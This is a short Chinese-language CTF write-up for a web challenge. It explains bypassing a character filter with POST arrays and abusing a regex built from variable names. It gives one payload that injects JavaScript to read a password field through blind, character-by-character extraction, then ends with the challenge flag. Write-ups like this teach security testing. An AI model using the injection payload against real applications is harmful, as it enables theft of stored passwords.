关键几点:
题目不允许post带有#()字符,通过构造数组可以绕过;它把post的变量名直接放正则了;
并不知道password的完整字段名,我是用(function(a){for(var k in a){if(k[0]=='p')return a[k]}})(this)过的;无论返回什么都会显示OK,但发生错误时没响应。
payload:
.*[0]=#reg#&reg[0]=] || 33<(function(a){for(var k in a){if(k[0]=='p')return a[k]}})(this)[0].charCodeAt() || asdasd || ([

(asdasd用来报错)
效果:

然后就是盲注了
Flag:flag{13fc892df79a86494792e14dcbef252a}

 

打赏还是打残,这是个问题
[Pwn] BabyStack - Cpt.shao
[Web] ezDoor - pyz
立即登录, 发表评论.
没有帐号? 立即注册
0 条评论